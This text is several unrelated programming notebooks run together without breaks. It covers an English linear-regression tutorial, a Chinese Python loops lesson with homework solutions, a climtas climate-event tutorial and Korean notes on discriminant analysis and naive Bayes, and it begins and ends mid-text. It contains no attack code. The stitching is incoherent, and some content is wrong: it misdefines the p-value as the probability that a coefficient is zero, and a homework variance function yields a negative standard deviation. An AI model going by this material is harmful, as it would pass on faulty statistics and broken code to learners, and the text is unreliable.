convention. You can create 90% confidence intervals (which will be more narrow), 99% confidence intervals (which will be wider), or whatever intervals you like. Hypothesis Testing and p-valuesClosely related to confidence intervals is **hypothesis testing**. Generally speaking, you start with a **null hypothesis** and an **alternative hypothesis** (that is opposite the null). Then, you check whether the data supports **rejecting the null hypothesis** or **failing to reject the null hypothesis**.(Note that "failing to reject" the null is not the same as "accepting" the null hypothesis. The alternative hypothesis may indeed be true, except that you just don't have enough data to show that.)As it relates to model coefficients, here is the conventional hypothesis test:- **null hypothesis:** There is no relationship between TV ads and Sales (and thus $\beta_1$ equals zero)- **alternative hypothesis:** There is a relationship between TV ads and Sales (and thus $\beta_1$ is not equal to zero)How do we test this hypothesis? Intuitively, we reject the null (and thus believe the alternative) if the 95% confidence interval **does not include zero**. Conversely, the **p-value** represents the probability that the coefficient is actually zero:# print the p-values for the model coefficients lm.pvaluesIf the 95% confidence interval **includes zero**, the p-value for that coefficient will be **greater than 0.05**. If the 95% confidence interval **does not include zero**, the p-value will be **less than 0.05**. Thus, a p-value less than 0.05 is one way to decide whether there is likely a relationship between the feature and the response. (Again, using 0.05 as the cutoff is just a convention.)In this case, the p-value for TV is far less than 0.05, and so we **believe** that there is a relationship between TV ads and Sales.Note that we generally ignore the p-value for the intercept. How Well Does the Model Fit the data?The most common way to evaluate the overall fit of a linear model is by the **R-squared** value. R-squared is the **proportion of variance explained**, meaning the proportion of variance in the observed data that is explained by the model, or the reduction in error over the **null model**. (The null model just predicts the mean of the observed response, and thus it has an intercept and no slope.)R-squared is between 0 and 1, and higher is better because it means that more variance is explained by the model. Here's an example of what R-squared "looks like": You can see that the **blue line** explains some of the variance in the data (R-squared=0.54), the **green line** explains more of the variance (R-squared=0.64), and the **red line** fits the training data even further (R-squared=0.66). (Does the red line look like it's overfitting?)Let's calculate the R-squared value for our simple linear model:# print the R-squared value for the model lm.rsquaredIs that a "good" R-squared value? It's hard to say. The threshold for a good R-squared value depends widely on the domain. Therefore, it's most useful as a tool for **comparing different models**. Multiple Linear RegressionSimple linear regression can easily be extended to include multiple features. This is called **multiple linear regression**:$y = \beta_0 + \beta_1x_1 + ... + \beta_nx_n$Each $x$ represents a different feature, and each feature has its own coefficient. In this case:$y = \beta_0 + \beta_1 \times TV + \beta_2 \times Radio + \beta_3 \times Newspaper$Let's use Statsmodels to estimate these coefficients:# create a fitted model with all three features lm = smf.ols(formula='Sales ~ TV + Radio + Newspaper', data=data).fit() # print the coefficients lm.paramsHow do we interpret these coefficients? For a given amount of Radio and Newspaper ad spending, an **increase of $1000 in TV ad spending** is associated with an **increase in Sales of 45.765 widgets**.A lot of the information we have been reviewing piece-by-piece is available in the model summary output:# print a summary of the fitted model lm.summary()What are a few key things we learn from this output?- TV and Radio have significant **p-values**, whereas Newspaper does not. Thus we reject the null hypothesis for TV and Radio (that there is no association between those features and Sales), and fail to reject the null hypothesis for Newspaper.- TV and Radio ad spending are both **positively associated** with Sales, whereas Newspaper ad spending is **slightly negatively associated** with Sales. (However, this is irrelevant since we have failed to reject the null hypothesis for Newspaper.)- This model has a higher **R-squared** (0.897) than the previous model, which means that this model provides a better fit to the data than a model that only includes TV. Feature SelectionHow do I decide **which features to include** in a linear model? Here's one idea:- Try different models, and only keep predictors in the model if they have small p-values.- Check whether the R-squared value goes up when you add new predictors.What are the **drawbacks** to this approach?- Linear models rely upon a lot of **assumptions** (such as the features being independent), and if those assumptions are violated (which they usually are), R-squared and p-values are less reliable.- Using a p-value cutoff of 0.05 means that if you add 100 predictors to a model that are **pure noise**, 5 of them (on average) will still be counted as significant.- R-squared is susceptible to **overfitting**, and thus there is no guarantee that a model with a high R-squared value will generalize. Below is an example:# only include TV and Radio in the model lm = smf.ols(formula='Sales ~ TV + Radio', data=data).fit() lm.rsquared # add Newspaper to the model (which we believe has no association with Sales) lm = smf.ols(formula='Sales ~ TV + Radio + Newspaper', data=data).fit() lm.rsquared**R-squared will always increase as you add more features to the model**, even if they are unrelated to the response. Thus, selecting the model with the highest R-squared is not a reliable approach for choosing the best linear model.There is alternative to R-squared called **adjusted R-squared** that penalizes model complexity (to control for overfitting), but it generally [under-penalizes complexity](http://scott.fortmann-roe.com/docs/MeasuringError.html).So is there a better approach to feature selection? **Cross-validation.** It provides a more reliable estimate of out-of-sample error, and thus is a better way to choose which of your models will best **generalize** to out-of-sample data. There is extensive functionality for cross-validation in scikit-learn, including automated methods for searching different sets of parameters and different models. Importantly, cross-validation can be applied to any model, whereas the methods described above only apply to linear models. Linear Regression in scikit-learnLet's redo some of the Statsmodels code above in scikit-learn:# create X and y feature_cols = ['TV', 'Radio', 'Newspaper'] X = data[feature_cols] y = data.Sales # follow the usual sklearn pattern: import, instantiate, fit from sklearn.linear_model import LinearRegression lm = LinearRegression() lm.fit(X, y) # print intercept and coefficients print lm.intercept_ print lm.coef_ # pair the feature names with the coefficients zip(feature_cols, lm.coef_) # predict for a new observation lm.predict([100, 25, 25]) # calculate the R-squared lm.score(X, y)Note that **p-values** and **confidence intervals** are not (easily) accessible through scikit-learn. Handling Categorical Predictors with Two CategoriesUp to now, all of our predictors have been numeric. What if one of our predictors was categorical?Let's create a new feature called **Size**, and randomly assign observations to be **small or large**:import numpy as np # set a seed for reproducibility np.random.seed(12345) # create a Series of booleans in which roughly half are True nums = np.random.rand(len(data)) mask_large = nums > 0.5 # initially set Size to small, then change roughly half to be large data['Size'] = 'small' data.loc[mask_large, 'Size'] = 'large' data.head()For scikit-learn, we need to represent all data **numerically**. If the feature only has two categories, we can simply create a **dummy variable** that represents the categories as a binary value:# create a new Series called IsLarge data['IsLarge'] = data.Size.map({'small':0, 'large':1}) data.head()Let's redo the multiple linear regression and include the **IsLarge** predictor:# create X and y feature_cols = ['TV', 'Radio', 'Newspaper', 'IsLarge'] X = data[feature_cols] y = data.Sales # instantiate, fit lm = LinearRegression() lm.fit(X, y) # print coefficients zip(feature_cols, lm.coef_)How do we interpret the **IsLarge coefficient**? For a given amount of TV/Radio/Newspaper ad spending, being a large market is associated with an average **increase** in Sales of 57.42 widgets (as compared to a Small market, which is called the **baseline level**).What if we had reversed the 0/1 coding and created the feature 'IsSmall' instead? The coefficient would be the same, except it would be **negative instead of positive**. As such, your choice of category for the baseline does not matter, all that changes is your **interpretation** of the coefficient. Handling Categorical Predictors with More than Two CategoriesLet's create a new feature called **Area**, and randomly assign observations to be **rural, suburban, or urban**:# set a seed for reproducibility np.random.seed(123456) # assign roughly one third of observations to each group nums = np.random.rand(len(data)) mask_suburban = (nums > 0.33) & (nums < 0.66) mask_urban = nums > 0.66 data['Area'] = 'rural' data.loc[mask_suburban, 'Area'] = 'suburban' data.loc[mask_urban, 'Area'] = 'urban' data.head()We have to represent Area numerically, but we can't simply code it as 0=rural, 1=suburban, 2=urban because that would imply an **ordered relationship** between suburban and urban (and thus urban is somehow "twice" the suburban category).Instead, we create **another dummy variable**:# create three dummy variables using get_dummies, then exclude the first dummy column area_dummies = pd.get_dummies(data.Area, prefix='Area').iloc[:, 1:] # concatenate the dummy variable columns onto the original DataFrame (axis=0 means rows, axis=1 means columns) data = pd.concat([data, area_dummies], axis=1) data.head()Here is how we interpret the coding:- **rural** is coded as Area_suburban=0 and Area_urban=0- **suburban** is coded as Area_suburban=1 and Area_urban=0- **urban** is coded as Area_suburban=0 and Area_urban=1Why do we only need **two dummy variables, not three?** Because two dummies captures all of the information about the Area feature, and implicitly defines rural as the baseline level. (In general, if you have a categorical feature with k levels, you create k-1 dummy variables.)If this is confusing, think about why we only needed one dummy variable for Size (IsLarge), not two dummy variables (IsSmall and IsLarge).Let's include the two new dummy variables in the model:# create X and y feature_cols = ['TV', 'Radio', 'Newspaper', 'IsLarge', 'Area_suburban', 'Area_urban'] X = data[feature_cols] y = data.Sales # instantiate, fit lm = LinearRegression() lm.fit(X, y) # print coefficients zip(feature_cols, lm.coef_)循环- 循环是一种控制语句块重复执行的结构- while 适用于广度遍历- for 开发中经常使用 while 循环- 当一个条件保持真的时候while循环重复执行语句- while 循环一定要有结束条件,否则很容易进入死循环- while 循环的语法是: while loop-contunuation-conndition: Statementi = 0 while i<10: print('hahaha') i += 1示例:sum = 0i = 1while i <10: sum = sum + i i = i + 1 错误示例:sum = 0i = 1while i <10: sum = sum + ii = i + 1- 一旦进入死循环可按 Ctrl + c 停止 EP:![](../Photo/143.png)![](../Photo/144.png) 验证码- 随机产生四个字母的验证码,如果正确,输出验证码正确。如果错误,产生新的验证码,用户重新输入。- 验证码只能输入三次,如果三次都错,返回“别爬了,我们小网站没什么好爬的”- 密码登录,如果三次错误,账号被锁定import random n = random.randint(65,122) N = "" i = 0 while 1: if 91<=n<=96: n = random.randint(65,122) else: N += chr(n) n = random.randint(65,122) i += 1 if i == 4: break print(N) count = 0 for i in range(1000): a = random.randint(0,1000) / 1000 if 0尝试死循环 实例研究:猜数字- 你将要编写一个能够随机生成一个0到10之间的且包括两者的数字程序,这个程序- 提示用户连续地输入数字直到正确,且提示用户输入的数字是过高还是过低 使用哨兵值来控制循环- 哨兵值来表明输入的结束- ![](../Photo/54.png) 警告![](../Photo/55.png) for 循环- Python的for 循环通过一个序列中的每个值来进行迭代- range(a,b,k), a,b,k 必须为整数- a: start- b: end- k: step- 注意for 是循环一切可迭代对象,而不是只能使用rangefor i in range(100): print('Joker is a better man!') a = 100 bb = 'JOker' bb.__iter__() c = [1,2,3] c.__iter__ {'key':'value'}.__iter__ (1,3,43).__iter__ {1,2,43}.__iter__ for i in range(5): print(i)在Python里面一切皆对象 EP:- ![](../Photo/145.png)i = 1 sum_ = 0 while sum_ < 10000: sum_ += i i += 1 print(sum_) sum_ = 0 for i in range(1,10001): sum_ += i if sum_ > 10000: break print(sum_) sum = 0 i = 0 while i < 1001: sum = sum + i i += 1 print(sum)500500嵌套循环- 一个循环可以嵌套另一个循环- 每次循环外层时,内层循环都会被刷新重新完成循环- 也就是说,大循环执行一次,小循环会全部执行一次- 注意:> - 多层循环非常耗时 - 最多使用3层循环 EP:- 使用多层循环完成9X9乘法表- 显示50以内所有的素数 关键字 break 和 continue- break 跳出循环,终止循环- continue 跳出此次循环,继续执行for i in range(1,10): for j in range(1,i+1): print(j,'X',i,'=',i*j,end=' ') print()1 X 1 = 1 1 X 2 = 2 2 X 2 = 4 1 X 3 = 3 2 X 3 = 6 3 X 3 = 9 1 X 4 = 4 2 X 4 = 8 3 X 4 = 12 4 X 4 = 16 1 X 5 = 5 2 X 5 = 10 3 X 5 = 15 4 X 5 = 20 5 X 5 = 25 1 X 6 = 6 2 X 6 = 12 3 X 6 = 18 4 X 6 = 24 5 X 6 = 30 6 X 6 = 36 1 X 7 = 7 2 X 7 = 14 3 X 7 = 21 4 X 7 = 28 5 X 7 = 35 6 X 7 = 42 7 X 7 = 49 1 X 8 = 8 2 X 8 = 16 3 X 8 = 24 4 X 8 = 32 5 X 8 = 40 6 X 8 = 48 7 X 8 = 56 8 X 8 = 64 1 X 9 = 9 2 X 9 = 18 3 X 9 = 27 4 X 9 = 36 5 X 9 = 45 6 X 9 = 54 7 X 9 = 63 8 X 9 = 72 9 X 9 = 81注意![](../Photo/56.png)![](../Photo/57.png) Homework- 1 ![](../Photo/58.png)a = 1 sum_ = 0 b = 0 c = 0 d = 0 def zs(): global b b += 1 def fs(): global c c += 1 def cs(): global d d += 1 def date(): global a global sum_ while a != 0: a = eval(input('输入')) if a>0: zs() if a<0: fs() if a != 0: cs() sum_ += a date() print(b) print(c) print(sum_ / d)输入1 输入2 输入-1 输入3 输入0 3 1 1.25- 2![](../Photo/59.png)def doll(): menoy = 10000 year = 0 while year<15: year += 1 menoy = menoy + menoy*0.05 if year == 10: print('%.6f'%(menoy)) elif year == 14: print('%.6f'%(menoy)) doll()16288.946268 19799.315994- 3![](../Photo/58.png) - 4![](../Photo/60.png)def shuzi(): num = 100 i=0 while num<1001: num += 1 if num % 5 == 0 and num % 6 ==0: print(num,end=' ') i +=1 if i%10==0: print() shuzi()120 150 180 210 240 270 300 330 360 390 420 450 480 510 540 570 600 630 660 690 720 750 780 810 840 870 900 930 960 990- 5![](../Photo/61.png)def n(): a=0 a1=0 while a**2 < 12000: a += 1 print(a) while a1**3 < 12000: a1 += 1 print(a1-1) n()110 22- 6![](../Photo/62.png)def lixi(): global rate global monthly global money while rate<0.081: monthly=money*rate money=money+monthly print('%.3f %.2f %.2f'%(rate*100,monthly,money)) rate=rate+0.00125 money=int(input('Loan Amount:')) years=int(input('Number of Years:')) rate=0.05 print('Interest Rate Monthly Payment Total Payment') while rate<0.081: lixi()Loan Amount:10000 Number of Years:5 Interest Rate Monthly Payment Total Payment 5.000 500.00 10500.00 5.125 538.12 11038.12 5.250 579.50 11617.63 5.375 624.45 12242.07 5.500 673.31 12915.39 5.625 726.49 13641.88 5.750 784.41 14426.29 5.875 847.54 15273.83 6.000 916.43 16190.26 6.125 991.65 17181.91 6.250 1073.87 18255.78 6.375 1163.81 19419.59 6.500 1262.27 20681.86 6.625 1370.17 22052.04 6.750 1488.51 23540.55 6.875 1618.41 25158.96 7.000 1761.13 26920.09 7.125 1918.06 28838.15 7.250 2090.77 30928.91 7.375 2281.01 33209.92 7.500 2490.74 35700.66 7.[...]- 7![](../Photo/63.png)def bj(): n = 0 n1 = 0 i = 0 for i in range(50000,0,-1): n += 1/i print(n) for i in range(1,50001,1): n1 += 1/i print(n1) bj()11.397003949278519 11.397003949278504- 8![](../Photo/64.png)def bj(): n = 0 for i in range(1,98,2): n += i/ (i+2) print('答案:%.2f'%n) bj()答案:45.12- 9![](../Photo/65.png)def js(x): n= 0 for i in range(1,x): n += 4*((-1)**(i+1)/(2*i-1)) print(n) for i in range(10000,100001,10000): js(i)3.1416926635905345 3.1416426560898874 3.1416259880342583 3.1416176542148064 3.1416126539897853 3.1416093205342155 3.1416069395081365 3.1416051537460006 3.1416037648243034 3.1416026536897204- 10 ![](../Photo/66.png)def js(): for i in range(1,10000): n = 0 for j in range(1,i): if i % j == 0: n += j if i == n: print(i,end = ' ') js()6 28 496 8128- 11![](../Photo/67.png)a = 0 i = 0 j = 0 def js1(): global i global j for i in range(1,8,1): for j in range(i+1,8): if i!=j: js2() def js2(): global a print(i,j) a += 1 print(a) js1()1 2 1 1 3 2 1 4 3 1 5 4 1 6 5 1 7 6 2 3 7 2 4 8 2 5 9 2 6 10 2 7 11 3 4 12 3 5 13 3 6 14 3 7 15 4 5 16 4 6 17 4 7 18 5 6 19 5 7 20 6 7 21- 12![](../Photo/68.png)def js(): sum=0 sum2=0 for i in range(10): x=float(input()) sum=sum+x sum2=sum2+x*x print('The mean is %.2f'%(sum/10)) FC=(sum2-sum*sum)/90 print('The standard deviation is ',FC) print('Enter ten number :',end=" ") js()Enter ten number : 1 2 3 5.5 5.6 6 7 8 9 10 The mean is 5.71 The standard deviation is -31.720000000000002Eventimport xarray import numpy import pandas import climtas import xesmf import dask.arrayWe have a Dask dataset, and we'd like to identify periods where the value is above some thresholdtime = pandas.date_range('20010101', '20040101', freq='D', closed='left') data = dask.array.random.random((len(time),50,100), chunks=(90,25,25)) lat = numpy.linspace(-90, 90, data.shape[1]) lon = numpy.linspace(-180, 180, data.shape[2], endpoint=False) da = xarray.DataArray(data, coords=[('time', time), ('lat', lat), ('lon', lon)], name='temperature') da.lat.attrs['standard_name'] = 'latitude' da.lon.attrs['standard_name'] = 'longitude' da[climtas.event.find_events](api/event.rstclimtas.event.find_events) will create a Pandas table of events. You give it an array of boolean values, `True` if an event is active, which can e.g. be generated by comparing against a threshold like a mean or percentile.threshold = da.mean('time') events = climtas.event.find_events(da > threshold, min_duration = 10) eventsSince the result is a Pandas table normal Pandas operations will work, here's a histogram of event durations. The values in the event table are the array indices where events start and the number of steps the event is active for.events.hist('event_duration', grid=False);You can convert from the indices to coordinates using [climtas.event.event_coords](api/event.rstclimtas.event.event_coords). Events still active at the end of the dataset are marked with a duration of NaT (not a time)coords = climtas.event.event_coords(da, events) coordsTo get statistics for each event use [climtas.event.map_events](api/event.rstclimtas.event.map_events). This takes a function that is given the event's data and returns a dict of different statistics. It's helpful to use `.values` here to return a number instead of a DataArray with coordinates and attributes.stats = climtas.event.map_events(da, events, lambda x: {'sum': x.sum().values, 'mean': x.mean().values}) statsAgain this is a Pandas dataframe, so you can join the different tables really simplycoords.join(stats)7.1 선형판별분석법과 이차판별분석법이차판별분석법import warnings warnings.filterwarnings(action='ignore') import scipy as sp import scipy.stats import statsmodels.api as sm import sklearn as sk import seaborn as sns import matplotlib as mpl import matplotlib.pylab as plt # 한글 나오도록 설정하기 set(sorted([f.name for f in mpl.font_manager.fontManager.ttflist])) # 폰트 설정 mpl.rc('font', family='NanumGothic') # 유니코드에서 음수 부호설정 mpl.rc('axes', unicode_minus=False) N = 100 rv1 = sp.stats.multivariate_normal([ 0, 0], [[0.7, 0.0], [0.0, 0.7]]) rv2 = sp.stats.multivariate_normal([ 1, 1], [[0.8, 0.2], [0.2, 0.8]]) rv3 = sp.stats.multivariate_normal([-1, 1], [[0.8, 0.2], [0.2, 0.8]]) np.random.seed(0) X1 = rv1.rvs(N) X2 = rv2.rvs(N) X3 = rv3.rvs(N) y1 = np.zeros(N) y2 = np.ones(N) y3 = 2 * np.ones(N) X = np.vstack([X1, X2, X3]) y = np.hstack([y1, y2, y3]) plt.scatter(X1[:, 0], X1[:, 1], alpha=0.8, s=50, marker="o", color='r', label="class 1") plt.scatter(X2[:, 0], X2[:, 1], alpha=0.8, s=50, marker="s", color='g', label="class 2") plt.scatter(X3[:, 0], X3[:, 1], alpha=0.8, s=50, marker="x", color='b', label="class 3") plt.xlim(-5, 5) plt.ylim(-4, 5) plt.xlabel("$x_1$") plt.ylabel("$x_2$") plt.legend() plt.show() from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis qda = QuadraticDiscriminantAnalysis(store_covariance=True).fit(X, y) # 각 클래스 k의 사전확률 qda.priors_ # 각 클래스 k 에서 x 의 기댓값 벡터 μk 의 추정치 벡터 qda.means_ # 각 클래스 k 에서 x 의 공분산 행렬 Σk 의 추정치 행렬. # (생성자 인수 store_covariance 값이 True인 경우에만 제공) # sigma1 구한것 qda.covariance_[0] # sigma2 구한것 qda.covariance_[1] # p(2,-1|y=1),p(2,-1|y=2),p(2,-1|y=3) # 가능도를 구한것,, # priors는 1/3으로 동일하게 줬었음 rv1=sp.stats.multivariate_normal(X1.mean(axis=0),np.cov(X1.T)) rv2=sp.stats.multivariate_normal(X2.mean(axis=0),np.cov(X2.T)) rv3=sp.stats.multivariate_normal(X3.mean(axis=0),np.cov(X3.T)) rv1.pdf([2,-1]),rv2.pdf([2,-1]),rv3.pdf([2,-1]) x1min, x1max = -5, 5 x2min, x2max = -4, 5 XX1, XX2 = np.meshgrid(np.arange(x1min, x1max, (x1max-x1min)/1000), np.arange(x2min, x2max, (x2max-x2min)/1000)) YY = np.reshape(qda.predict(np.array([XX1.ravel(), XX2.ravel()]).T), XX1.shape) cmap = mpl.colors.ListedColormap(sns.color_palette(["r", "g", "b"]).as_hex()) plt.contourf(XX1, XX2, YY, cmap=cmap, alpha=0.5) plt.scatter(X1[:, 0], X1[:, 1], alpha=0.8, s=50, marker="o", color='r', label="클래스 1") plt.scatter(X2[:, 0], X2[:, 1], alpha=0.8, s=50, marker="s", color='g', label="클래스 2") plt.scatter(X3[:, 0], X3[:, 1], alpha=0.8, s=50, marker="x", color='b', label="클래스 3") plt.xlim(x1min, x1max) plt.ylim(x2min, x2max) plt.xlabel("$x_1$") plt.ylabel("$x_2$") plt.title("이차판별분석법 결과") plt.legend() plt.show()label_binarizeOvR ROC커브를 그릴때 사용할 수 있는 원핫인코딩 함수from sklearn.preprocessing import label_binarize y label_binarize(y,[0,1,2]) # y->y1 y2 y3 로 쪼개줌 # y1 0인지 아닌지 # y2 1인지 아닌지 # y3 2인지 아닌지iris데이터를 QDA로 분석from sklearn.naive_bayes import GaussianNB from sklearn.datasets import load_iris from sklearn.preprocessing import label_binarize from sklearn.metrics import roc_curve iris=load_iris() x=iris.data y=label_binarize(iris.target,[0,1,2]) # None이 세개 들어있는 리스트를 만듦 fpr=[None]*3 tpr=[None]*3 thr=[None]*3 for i in range(3): model=QuadraticDiscriminantAnalysis().fit(x,y[:,i]) fpr[i],tpr[i],thr[i]=roc_curve(y[:,i],model.predict_proba(x)[:,1]) plt.plot(fpr[i],tpr[i]) plt.xlabel("위양성률(Fall-Out)") plt.ylabel("재현률(Recall)") plt.show() fpr선형판별분석법N = 100 rv1 = sp.stats.multivariate_normal([ 0, 0], [[0.7, 0.0], [0.0, 0.7]]) rv2 = sp.stats.multivariate_normal([ 1, 1], [[0.8, 0.2], [0.2, 0.8]]) rv3 = sp.stats.multivariate_normal([-1, 1], [[0.8, 0.2], [0.2, 0.8]]) np.random.seed(0) X1 = rv1.rvs(N) X2 = rv2.rvs(N) X3 = rv3.rvs(N) y1 = np.zeros(N) y2 = np.ones(N) y3 = 2 * np.ones(N) X = np.vstack([X1, X2, X3]) y = np.hstack([y1, y2, y3]) plt.scatter(X1[:, 0], X1[:, 1], alpha=0.8, s=50, marker="o", color='r', label="class 1") plt.scatter(X2[:, 0], X2[:, 1], alpha=0.8, s=50, marker="s", color='g', label="class 2") plt.scatter(X3[:, 0], X3[:, 1], alpha=0.8, s=50, marker="x", color='b', label="class 3") plt.xlim(-5, 5) plt.ylim(-4, 5) plt.xlabel("$x_1$") plt.ylabel("$x_2$") plt.legend() plt.show() from sklearn.discriminant_analysis import LinearDiscriminantAnalysis # component써줘야함 근데 교재에는 3으로 되어있었는데 안돌아가서 2로함 lda = LinearDiscriminantAnalysis(n_components=2, solver="svd", store_covariance=True).fit(X, y) lda.means_ lda.covariance_ # 결과 x1min, x1max = -5, 5 x2min, x2max = -4, 5 XX1, XX2 = np.meshgrid(np.arange(x1min, x1max, (x1max-x1min)/1000), np.arange(x2min, x2max, (x2max-x2min)/1000)) YY = np.reshape(lda.predict(np.array([XX1.ravel(), XX2.ravel()]).T), XX1.shape) cmap = mpl.colors.ListedColormap(sns.color_palette(["r", "g", "b"]).as_hex()) plt.contourf(XX1, XX2, YY, cmap=cmap, alpha=0.5) plt.scatter(X1[:, 0], X1[:, 1], alpha=0.8, s=50, marker="o", color='r', label="클래스 1") plt.scatter(X2[:, 0], X2[:, 1], alpha=0.8, s=50, marker="s", color='g', label="클래스 2") plt.scatter(X3[:, 0], X3[:, 1], alpha=0.8, s=50, marker="x", color='b', label="클래스 3") plt.xlim(x1min, x1max) plt.ylim(x2min, x2max) plt.xlabel("$x_1$") plt.ylabel("$x_2$") plt.legend() plt.title("LDA 분석 결과") plt.show()iris데이터를 LDA로 분석iris=load_iris() x=iris.data y=label_binarize(iris.target,[0,1,2]) # None이 세개 들어있는 리스트를 만듦 fpr=[None]*3 tpr=[None]*3 thr=[None]*3 for i in range(3): model=LinearDiscriminantAnalysis( solver="svd", store_covariance=True).fit(x,y[:,i]) fpr[i],tpr[i],thr[i]=roc_curve(y[:,i],model.predict_proba(x)[:,1]) plt.plot(fpr[i],tpr[i]) plt.xlabel("위양성률(Fall-Out)") plt.ylabel("재현률(Recall)") plt.show() import warnings warnings.filterwarnings(action='ignore') import scipy as sp import scipy.stats import statsmodels.api as sm import sklearn as sk import seaborn as sns import matplotlib as mpl import matplotlib.pylab as plt from sklearn.naive_bayes import GaussianNB from sklearn.discriminant_analysis import LinearDiscriminantAnalysis from sklearn.datasets import load_iris from sklearn.preprocessing import label_binarize from sklearn.metrics import confusion_matrix from sklearn.metrics import classification_report y_true = [1, 0, 1, 1, 0, 1] y_pred = [0, 0, 1, 1, 0, 1] confusion_matrix(y_true, y_pred) print(classification_report(y_true, y_pred, target_names=['class 0', 'class 1'])) confusion_matrix(y_true, y_pred, labels=[1, 0])7.2 나이브베이즈 분류모형 조건부 독립# C는 어미의 몸무게 # A는 형의 몸무게 # B는 동생의 몸무게 np.random.seed(0) C = np.random.normal(100, 15, 2000) A = C + np.random.normal(0, 5, 2000) B = C + np.random.normal(0, 5, 2000) plt.figure(figsize=(8, 4)) plt.subplot(121) plt.scatter(A, B) plt.xlabel("A") plt.ylabel("B") plt.xlim(30, 180) plt.ylim(30, 180) plt.title("A와 B의 무조건부 상관관계") plt.subplot(122) idx1 = (118 < C) & (C < 122) idx2 = (78 < C) & (C < 82) plt.scatter(A[idx1], B[idx1], label="C=120") plt.scatter(A[idx2], B[idx2], label="C=80") plt.xlabel("A") plt.ylabel("B") plt.xlim(30, 180) plt.ylim(30, 180) plt.legend() plt.title("B와 C의 조건부 상관관계") plt.tight_layout() plt.show()사이킷런에서 제공하는 나이브베이즈 모형np.random.seed(0) rv0 = sp.stats.multivariate_normal([-2, -2], [[1, 0.9], [0.9, 2]]) rv1 = sp.stats.multivariate_normal([2, 2], [[1.2, -0.8], [-0.8, 2]]) X0 = rv0.rvs(40) X1 = rv1.rvs(60) X = np.vstack([X0, X1]) y = np.hstack([np.zeros(40), np.ones(60)]) xx1 = np.linspace(-5, 5, 100) xx2 = np.linspace(-5, 5, 100) XX1, XX2 = np.meshgrid(xx1, xx2) plt.grid(False) plt.contour(XX1, XX2, rv0.pdf(np.dstack([XX1, XX2])), cmap=mpl.cm.cool) plt.contour(XX1, XX2, rv1.pdf(np.dstack([XX1, XX2])), cmap=mpl.cm.hot) plt.scatter(X0[:, 0], X0[:, 1], marker="o", c='b', label="y=0") plt.scatter(X1[:, 0], X1[:, 1], marker="s", c='r', label="y=1") plt.legend() plt.title("데이터의 확률분포") plt.axis("equal") plt.show() from sklearn.naive_bayes import GaussianNB model_norm = GaussianNB().fit(X, y) model_norm.classes_ model_norm.class_count_ model_norm.class_prior_각 클래스에 따라 x 가 이루는 확률분포의 모수를 계산하면 다음과 같다. 나이브 가정에 따라 x1,x2 는 독립이므로 상관관계를 구하지 않았다.model_norm.theta_[0], model_norm.sigma_[0] model_norm.theta_[1], model_norm.sigma_[1] rv0 = sp.stats.multivariate_normal(model_norm.theta_[0], model_norm.sigma_[0]) rv1 = sp.stats.multivariate_normal(model_norm.theta_[1], model_norm.sigma_[1]) xx1 = np.linspace(-5, 5, 100) xx2 = np.linspace(-5, 5, 100) XX1, XX2 = np.meshgrid(xx1, xx2) plt.grid(False) plt.contour(XX1, XX2, rv0.pdf(np.dstack([XX1, XX2])), cmap=mpl.cm.cool) plt.contour(XX1, XX2, rv1.pdf(np.dstack([XX1, XX2])), cmap=mpl.cm.hot) plt.scatter(X0[:, 0], X0[:, 1], marker="o", c='b', label="y=0") plt.scatter(X1[:, 0], X1[:, 1], marker="s", c='r', label="y=1") x_new = [0, 0] plt.scatter(x_new[0], x_new[1], c="g", marker="x", s=150, linewidth=5) plt.legend() plt.title("나이브베이즈로 추정한 데이터의 확률분포") plt.axis("equal") plt.show() model_norm.predict_proba([x_new])```이 모형을 사용하여 xnew=(0,0) 인 데이터의 y 값을 예측하자. 각 클래스값이 나올 확률은 predict_proba 메서드로 구할 수 있다. 결과는 y=0일 확률이 0.48, y=1일 확률이 0.52이다``` 구해지는 과정을 살펴보면# 가능도를 구하고 likelihood = [ (sp.stats.norm(model_norm.theta_[0][0], np.sqrt(model_norm.sigma_[0][0])).pdf(x_new[0]) * \ sp.stats.norm(model_norm.theta_[0][1], np.sqrt(model_norm.sigma_[0][1])).pdf(x_new[1])), (sp.stats.norm(model_norm.theta_[1][0], np.sqrt(model_norm.sigma_[1][0])).pdf(x_new[0]) * \ sp.stats.norm(model_norm.theta_[1][1], np.sqrt(model_norm.sigma_[1][1])).pdf(x_new[1])), ] likelihood # 사전확률을 곱해줌 # p(x)로 나누지 않았기 때문에 이 값은 확률은 아님 # 그러나 크기비교만 하면 되기 때문에 상관 없음 posterior = likelihood * model_norm.class_prior_ posterior # 확률을 구하고 싶다면 전체확률법칙을 이용하면 됨 posterior / posterior.sum()붓꽃 분류문제를 가우시안 나이브베이즈 모형을 사용하여 풀어iris=load_iris() x=iris.data y=iris.target model_norm = GaussianNB().fit(x, y) model_norm.classes_ model_norm.class_count_ model_norm.class_prior_ model_norm.theta_[0], model_norm.sigma_[0] model_norm.theta_[1], model_norm.sigma_[1] model_norm.theta_[2], model_norm.sigma_[2] y_pred=model_norm.predict(x) from sklearn.metrics import classification_report target_names=["class0","class1","class2"] print(classification_report(y,y_pred,target_names=target_names))precision recall f1-score support class0 1.00 1.00 1.00 50 class1 0.94 0.94 0.94 50 class2 0.94 0.94 0.94 50 accuracy 0.96 150 macro avg 0.96 0.96 0.96 150 weighted avg 0.96 0.96 0.96 150스무딩 ```이 데이터는 4개의 키워드를 사용하여 정상 메일 4개와 스팸 메일 6개를 BOW 인코딩한 행렬이다. 예를 들어 첫번째 메일은 정상 메일이고 1번, 4번 키워드는 포함하지 않지만 2번, 3번 키워드를 포함한다고 볼 수 있다.```X = np.array([ [0, 1, 1, 0], [1, 1, 1, 1], [1, 1, 1, 0], [0, 1, 0, 0], [0, 0, 0, 1], [0, 1, 1, 0], [0, 1, 1, 1], [1, 0, 1, 0], [1, 0, 1, 1], [0, 1, 1, 0]]) y = np.array([0, 0, 0, 0, 1, 1, 1, 1, 1, 1]) # 이 데이터를 베르누이 나이브베이즈 모형으로 예측해 보자. from sklearn.naive_bayes import BernoulliNB model_bern = BernoulliNB().fit(X, y) model_bern.classes_ model_bern.class_count_ np.exp(model_bern.class_log_prior_) # y=0일때 1~4번단어가 포함된 횟수 # y=1일때 1~4번단어가 포함된 횟수 fc = model_bern.feature_count_ fc # y=0인케이스가 4개인데 그중 2개가 1번단어를 포함 -> 확률 0.5 # y=0인케이스가 4개인데 그중 2개가 1번단어를 포함 -> 확률 0.5 fc / np.repeat(model_bern.class_count_[:, np.newaxis], 4, axis=1) # 스무딩 되어있었던것 model_bern.alpha theta=np.exp(model_bern.feature_log_prob_) theta # 데이터를 